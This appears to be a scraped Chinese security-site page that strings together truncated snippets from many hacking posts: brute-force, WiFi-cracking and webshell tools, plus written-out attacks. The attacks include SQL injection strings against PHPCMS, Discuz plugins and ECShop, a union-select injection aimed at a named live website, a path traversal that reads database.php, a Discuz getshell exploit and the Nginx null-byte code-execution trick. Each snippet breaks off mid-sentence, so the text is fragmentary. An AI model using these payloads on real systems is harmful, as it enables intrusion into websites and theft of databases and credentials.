此程序写给一位未来的女黑客Lay,本着造福世界的心态决定发出来。 使用说明:如果要使用自定义字典,请把字典文件命名为dic,放到跟程序同目录下,程序会自动加载字典。如果没有自定义字典,程序会自动使用内置字典,内置字典总共两万多条数据,内容包括了常用子域名,以及3000+常用单词和1-3位所有字母。如果要爆破二级以下域名,可以直接填入要爆破的子域名,程序会自动拼接下一级子域。比如填入hi.
菜刀数据库去密码脚本代码如下:Set args = WScript.Arguments if args.count<>1 then msgbox "need file":wscript.quit Set conn =CreateObject("ADODB.Connection") pwd
#!/usr/bin/env python # encoding: utf-8 # Hash Identifier v1.1 # By Zion3R # www.Blackploit.com # Root@Blackploit.com logo='''  
Assassin 翻译过来刺客的意思,信息探测。目前这个小工具只有两个功能,一个是旁注,另外一个是子域名暴力破解。貌似国内还没有写Burp插件的,没见别人发过,也可能别人早已经写好了在偷偷用了。这个工具,以后会增加很多信息探测的功能。比如Web指纹识别,端口探测,漏洞自动化利用。Assassin如下图所示:1、子域名枚举2、旁注查询百度网盘 提取密码:ccua转自:http://www
Wi-fEye是一款自动无线渗透测试工具,由python编写。通过这款工具,安全测试人员可以快速和轻松的对wifi网络进行渗透测试。特性:1.破解模块: 可用于破解wifi密码,如WEP , WPA或WPA2Enable monitor modeView avalale Wireless NetworksLaunch Airodump-ng on a specific APWEP cracking
课程表:第一课;免费获取安卓收费程序无需root权限第二课;突破安卓收费wifi-2013第三课;Android WiFi破解程序的使用第四课;反Android网络工具包的视频演示第五课;Android设备[免费的应用程序下载]裂纹的WiFi密码第六课;dsploit -如何破解无线网络密码的第1部分第七课;dsploit -如何破解无线网络密码使用Android的第2部分第八课;安卓渗透测试fa
下载地址
+-------------------------------------------+ +----------------------------
<?php $path="c:/windows/system32/canimei"; session_start(); if(!empty($_POST['submit'])){ setcookie("connect"); setcookie("connect[host]",$_POST['host']); setcookie("connect[user]",$_POST['user']);
FruityWifi是一款无线安全审计,灵感来自于wifi pineapple。这个程序可以安装在Debian系列的操作系统上,在Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi树莓派), Pwnpi (Raspberry Pi)测试通过。在这次新版本中,你可以安装第三方模块了,这些模块有Hostap
当你觉得传统信息安全手段都用完了的时候,你是否想过还有暴力破解啊。现在一般的大型网站都是dz论坛跟wp博客,没有0DAY在手怎么办啊,你忘了一句话叫做不怕神一样的对手只怕猪一样的队友啊,结合非传统的社工工程学收集信息,制作字典,最后进行fuzz。没事写了个PHP版的fuzz,只写了dz跟wp的模块,有兴趣的朋友自己添加其他模块。有好的常用弱口令的同学麻烦在此帖共享下。另外没有写自动抓取dz管理员列
命令参数忘记编码了,导致不能执行多参数已修复了。修改了超时为10秒、异常情况直接输出页面源码。1、ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具包这个漏洞如果被利用可直接在服
Altman,the webshell tool,自己写的一款开源软件。0×00前言之前用过几款webshell工具,有B/C的也有C/S的,有的只能用于php或者aspx,当然个人用得最多、觉得用得舒服的也只有菜刀了。但是毕竟菜刀是好几年之前的产物了,而且也已经停止更新了,用得久了也发现一些问题,但又不好解决。去年的年底,自己突然有了个想法,自己要写一个webshell工具,工具的自定义要最大化
已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。下载地址:DZ7.2附代码:<?php /** * @author: xiaoma * @blog :&nb
一、本地构造test.html上传页面<!-- * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico&nb
< ? php /** * 飞飞影视管理系统 SQL injection * 飞飞影视系统PHP版 v1.9 injection exploit * by:www.08sec.com fans * keyword “Powered by www
Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码影响版本:nginx 0.5.*nginx 0.6.*nginx 0.7 <= 0.7.65nginx 0.8 <= 0.8.37
把任意商品加入购物车在填写配送地址那一页,有地区选择flow.php?step=consignee&direct_shopping=1比如省选择安徽其中POST数据如下country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&addres
目标:http://www.lifegoeson.in/ 爆字段就不说了,可以看到上图字段分别是14 20 9我们就用14吧可以看到我们长度是33,http://www.lifegoeson.in/datapage.php?pid=11 and 0 union select 1,2,3,4,5
http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php成功读取数据库信息如下: 爆网站路径:http://www.xx.com/index.php?m=search&
PHPCMS_V9注入0DAY___EXP漏洞来源:土司:https://www.t00ls.net/thread-21894-1-1.htmlEXP构造:haxsscker土司只给了张烂图- -没给语句……那我就自己构造吧……本人构造结果如下:%60userid%60%3D%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.htmlhttp://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-comm
DZ交友插件漏洞jiaoyou.php?pid=1有的注入需要登录,注入代码如下:' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) 
Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号